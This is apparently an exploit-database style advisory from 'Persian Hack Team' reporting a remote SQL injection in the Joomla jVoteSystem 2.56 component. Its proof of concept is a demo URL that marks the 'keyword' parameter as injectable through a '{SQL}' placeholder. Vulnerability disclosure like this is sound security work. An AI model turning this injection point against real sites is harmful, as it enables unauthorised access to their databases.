Joomla jVoteSystem component version 2.56 suffers from a remote SQL injection vulnerability.
34b1e6a617c6e7a3e5d9350f0ae387d44c783f672278d3a00a69aed1ec0f7805
######################
# Exploit Title : Joomla jVoteSystem 2.56 Component - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://joomess.de/projects/jvotesystem
# Category [ Webapps ]
# Tested on [ Win ]
# Version : 2.56
# Date 2016/09/08
######################
#
# PoC
# => Sql Injection :
# Keyword Parameter Vulnerable To SQL
# Demo :
# http://www.site.com/index.php?option=com_jvotesystem&view=polls&cat=cw&keyword={SQL}&Itemid=12
# Youtube : https://youtu.be/LfxpuV47Q7M
######################
# Discovered by : Mojtaba MobhaM Mail:Kazemimojtaba@live.com
# B3li3v3 M3 I will n3v3r St0p
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################